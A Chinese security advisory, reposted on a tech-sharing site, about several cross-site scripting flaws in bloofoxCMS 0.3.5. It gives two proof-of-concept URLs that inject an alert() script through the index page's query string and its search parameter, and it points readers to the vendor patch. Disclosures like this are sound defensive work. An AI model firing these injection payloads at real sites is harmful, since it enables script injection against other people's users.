bloofoxCMS多个跨站脚本执行漏洞

xiaoheizi

2012-11-03

发布日期：2012-10-31
更新日期：2012-11-03

受影响系统：
Bloofox.com bloofoxCMS 0.3.5
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 56353

bloofoxCMS是一款开源的小型内容管理系统，采用PHP语言开发。

bloofoxCMS 0.3.5及其他版本存在安全漏洞，攻击者可利用这些漏洞在受影响站点的用户浏览器内执行任意脚本代码。

<*来源：Canberk BOLAT
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://www.example.com/index.php?'"--&gt;&lt;script&gt;alert(0x0004B3)

&lt;/script&gt;
http://www.example.com/index.php?search='"--&gt;&lt;script&gt;alert(0x0004B3)

&lt;/script&gt;

建议：
--------------------------------------------------------------------------------
厂商补丁：

Bloofox.com
-----------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.bloofox.com/cms/

amp 漏洞

xiaoheizi

0 关注 0 粉丝 0 动态

关注关注

FreeMarker & Mybatis & Basic OGNL expressions

Basic OGNL expressions

cuterabbitbaby 2020-05-12

iOS开发集成支付宝支付、支付宝&微信支付

支付宝&微信支付：。微信分享&微信支付

定格 2019-12-19

页首Html代码-时钟2

代码哥0 2019-10-27

TensorFlow最新应用&资源集锦

minushuang 2016-11-30

wwww4t

(src|SRC)=[\"\']([^>》]*?)[\"\'][^》]*?>";intstartIndex=bodyMatcher.start();intendIndex=bodyMatcher.end();Str

lamp 2013-06-12

程序猿修仙之路--算法之直接插入排序

空间复杂度排序算法的额外内存开销和运行时间同等重要。直接插入排序是一种稳定的排序算法。交换次数对于长度为N的主键不重复的列表，插入排序平均情况下需要n/4次交换，最坏情况下需要n/2次交换，最好情况下需要0次交换。假如列表的很大一部分元素是有序的，插入排序

sxyyu 2019-07-01

无线页面加速解决方案-AMP

AMP在国内应该很少有人接触得到，今天介绍一个比较冷门的，有条件的方便使用的前端无线页面框架。AMP特点AMP是Google与2015年9月推出的一个开源的，移动端页面加速解决方案。是Google生态的一环，主要有一下特点：。AMP制定了一些严格的页面编写

鱼目混杂的IT世界 2019-06-28

获取请求后面参数

号url=url.substr(1);if(url.length>0){vararr=url.split("&");for(vari=0;i0&&keyVal

代码哥0 2016-08-15

java --运用hhs 框架,tomcat 访问mysql 数据库连接失败后,自动重新连接怎么做?

useUnicode=true&characterEncoding=utf8&autoreconnect=true"p:username="pic"

shouen 2011-01-26

AMP HTML 页面初探- Hello , Accelerated Mobile Page

AMP已经出来很久了，最近看到官方说12月会在北京上海有路演，才想起自己好久没接触这个AMP了，之前为了试一试，把自己博客的about页面改成了AMP页面，当时还在上线前后用了google developer toos - pagespeed 测了下速，确

lamp 2019-06-26

Unity3D使用C#实现Coroutines & Yield

Coroutines & Yield是Unity3D编程中重要的概念，它可以实现将一段程序延迟执行或者将其各个部分分布在一个时间段内连续执行，但是在Javascript与C#中实现Coroutines & Yield，在语法上却有一些区别：

shengyingwang 2010-04-16

s:url传多参数出现&amp问题

Struts2标签中用s:url传多参数，发现参数传不到后台，后来将url打印出来，原来在url上多了一个&amp这个问题，修改方案：如果传1个参数以上时，需要将s:url标签中的escapeAmp属性设置为false就可以了

ggggde 2012-04-19

style

<astyle="background:url("http://im.bizapp.qq.com:8000/zx_qq.gif")no-repeatscroll0%0%transparent;displa

shengyingwang 2011-06-14

innerHTML 和 appendchild 的区别

x.innerHTML="<ahref='http://baidu.com'>&百度&</a>";//在页面显示为链向百度的"&百度&"超链接

代码哥0 2011-04-25

JQuery 5个小技巧

returnfalse;});});varcurrent=this.css('color');this.animate({color:'rgb('+color+')'},duration/2);this.animate({color:current},du

lamp 2011-02-28

常用的js函数处理

};};returnthis.replace(/(^\s*)|(\s*$)/g,"");returnthis.replace(/(^\s*)/g,"");returnthis.replace(/(\s*$)/g,&q

OneGit 2011-02-28

对于URL连接删除一个参数

Stringencode="<ahref=\"http://baidu.com/?Stringregex="<ahref=['\"]?http:[/\\\\]{2}(?!((baidu\\.com)|(b

yangfanxing 2012-08-23

类型转换运算符运算符重载 operator new operator delete

函数原型：operator 类型名();

lamp 2018-08-01

DeepMind首次披露旗下AI专利申请情况，引发热议

谷歌旗下的人工智能研究公司 DeepMind 近年来提交了一系列国际专利申请，这些申请现已首次公布。这些申请涉及现代机器学习的一些基本方面，因此对任何从事商业化人工智能领域的人都具有潜在的意义。此消息一经公开，就在 reddit 网站上引发热议。DeepM

AI启蒙研究院 2018-06-09

linux中的&&和&，|和||

& 表示任务在后台执行，如要在后台运行redis-server,则有 redis-server &&& 表示前一条命令执行成功时，才执行后一条命令，如 echo ‘1‘ &&

lamp 2019-03-20

安科网

bloofoxCMS多个跨站脚本执行漏洞

xiaoheizi

xiaoheizi

相关推荐

FreeMarker & Mybatis & Basic OGNL expressions

iOS开发集成支付宝支付、支付宝&微信支付

页首Html代码-时钟2

TensorFlow最新应用&资源集锦

wwww4t

程序猿修仙之路--算法之直接插入排序

无线页面加速解决方案-AMP

获取请求后面参数

java --运用hhs 框架,tomcat 访问mysql 数据库连接失败后,自动重新连接怎么做?

AMP HTML 页面初探- Hello , Accelerated Mobile Page

Unity3D使用C#实现Coroutines & Yield

s:url传多参数出现&amp问题

style

innerHTML 和 appendchild 的区别

JQuery 5个小技巧

常用的js函数处理

对于URL连接删除一个参数

类型转换运算符运算符重载 operator new operator delete

DeepMind首次披露旗下AI专利申请情况，引发热议

linux中的&&和&，|和||

xiaoheizi